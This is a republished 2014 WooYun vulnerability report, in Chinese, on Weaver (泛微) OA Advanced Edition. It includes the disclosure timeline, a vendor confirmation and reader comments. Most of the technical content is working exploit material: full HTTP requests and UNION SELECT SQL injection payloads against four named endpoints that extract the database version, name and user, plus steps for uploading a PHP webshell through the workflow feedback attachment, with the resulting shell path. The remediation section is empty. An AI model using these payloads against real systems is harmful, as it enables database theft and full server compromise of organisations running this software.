泛微OA漏洞集合·2(SQL注入/文件上传getshell)

admin
admin
admin
144121
文章
118
评论
2015年6月19日21:29:03评论1,378 views字数 235阅读0分47秒阅读模式
摘要

2014-09-19: 细节已通知厂商并且等待厂商处理中
2014-09-22: 厂商已经确认,细节仅向厂商公开
2014-09-25: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2014-11-16: 细节向核心白帽子及相关领域专家公开
2014-11-26: 细节向普通白帽子公开
2014-12-06: 细节向实习白帽子公开
2014-12-16: 细节向公众公开

漏洞概要 关注数(14) 关注此漏洞

缺陷编号: WooYun-2014-76191

漏洞标题: 泛微OA漏洞集合·2(SQL注入/文件上传getshell) 泛微OA漏洞集合·2(SQL注入/文件上传getshell)

相关厂商: 泛微OA

漏洞作者: 路人甲

提交时间: 2014-09-19 12:37

公开时间: 2014-12-16 12:38

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

6人收藏

漏洞详情

披露状态:

2014-09-19: 细节已通知厂商并且等待厂商处理中
2014-09-22: 厂商已经确认,细节仅向厂商公开
2014-09-25: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2014-11-16: 细节向核心白帽子及相关领域专家公开
2014-11-26: 细节向普通白帽子公开
2014-12-06: 细节向实习白帽子公开
2014-12-16: 细节向公众公开

简要描述:

...泛微系统办公高级版

详细说明:

:::::只为系统更安全:::::因问题较多,只拿官方demo演示:::::

泛微OA漏洞集合·2(SQL注入/文件上传getshell)

code 区域 
0x01:SQL注入漏洞 4 处

1# 注入点一

code 区域 
POST /general/new_mytable/content_list/content_-99.php?user_id=WV00000045&lang=cn HTTP/1.1
 Host: **.**.**.**:8028
 Proxy-Connection: keep-alive
 Content-Length: 40
 Accept: text/javascript, text/html, application/xml, text/xml, */*
 X-Prototype-Version: 1.6.0_rc0
 Origin: http://**.**.**.**:8028
 X-Requested-With: XMLHttpRequest
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
 Content-type: application/x-www-form-urlencoded; charset=UTF-8
 Referer: http://**.**.**.**:8028/general/new_mytable/newportal.php
 Accept-Encoding: gzip,deflate,sdch
 Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2
 Cookie: LOGIN_LANG=cn; PHPSESSID=a404fce9850b7c8c0272b077efc44820; USER_NAME_COOKIE=xj; LOGIN_LANG=cn
 
 block_id=1901&body_width=1121&_=
 
 问题参数 block_id

泛微OA漏洞集合·2(SQL注入/文件上传getshell)

2# 注入点二

code 区域 
http://**.**.**.**:8028/general/address/view/view_detail.php?ADD_ID=-169%20UNION%20SELECT%201,2,3,4,5,6,version(),8,9,database(),user(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46

泛微OA漏洞集合·2(SQL注入/文件上传getshell)

3# 注入点三

code 区域 
http://**.**.**.**:8028/general/address/docenter/export_do.php?group_id=19%20UNION%20SELECT%20user(),database(),version(),4,5,6,7,8,9,10,11,12,13,14,15,16
 这个注入点比较有意思,导出的通讯录中会有相关的数据库信息

泛微OA漏洞集合·2(SQL注入/文件上传getshell)

4# 注入点四

code 区域 
GET /general/file_folder/file_new/neworedit/getContentByType.php?type=1&content_id=319*&SORT_ID=148&FILE_SORT=1 HTTP/1.1
 Host: **.**.**.**:8028
 Proxy-Connection: keep-alive
 Cache-Control: max-age=0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
 Referer: http://**.**.**.**:8028/general/file_folder/file_new/neworedit/index.php?FILE_SORT=&CONTENT_ID=319&SORT_ID=148&func_id=&operationType=editFromRead&docStr=
 Accept-Encoding: gzip,deflate,sdch
 Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2
 Cookie: LOGIN_LANG=cn; PHPSESSID=a404fce9850b7c8c0272b077efc44820; USER_NAME_COOKIE=xj; LOGIN_LANG=cn
 
 问题参数为 content_id

泛微OA漏洞集合·2(SQL注入/文件上传getshell)

code 区域 
0x02:文件上传导致Getshell

办理流程 -- 费用报销 -- 签办反馈

http://**.**.**.**:8028/general/workflow/input_form/input_form.php?RUN_ID=5557&FLOW_ID=3115&PRCS_ID=1&FLOW_PRCS=1&FUNC_ID=

在“签办反馈”处可以上传文件(cvs --> php),最终可 getshell

泛微OA漏洞集合·2(SQL注入/文件上传getshell)

泛微OA漏洞集合·2(SQL注入/文件上传getshell)

泛微OA漏洞集合·2(SQL注入/文件上传getshell)

最终得到shell:http://**.**.**.**:8028/ATTACHMENT/1952281003/conf1g.php

泛微OA漏洞集合·2(SQL注入/文件上传getshell)

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-09-22 09:45

厂商回复:

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2014-09-17 13:46 | 动后河 ( 实习白帽子 | Rank:57 漏洞数:17 | ☭)

    0

    高级版有什么区别?

  2. 2014-12-16 13:17 | U神 ( 核心白帽子 | Rank:1375 漏洞数:152 | 乌云核心菜鸟,此号处于联盟托管中....)

    1

    关键是这个要登陆就没意思了

  3. 2014-12-16 16:13 | 浮萍 ( 普通白帽子 | Rank:1077 漏洞数:217 )

    1

    为何我们用的是jsp

  4. 2014-12-16 16:14 | Coody 泛微OA漏洞集合·2(SQL注入/文件上传getshell) ( 核心白帽子 | Rank:1809 漏洞数:214 | 不接单、不黑产;如遇冒名顶替接单收徒、绝...)

    1

    @浮萍 是另一套程序吧?

  5. 2014-12-16 16:28 | 浮萍 ( 普通白帽子 | Rank:1077 漏洞数:217 )

    1

    @Coody e-Weaver 应该吧~~

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin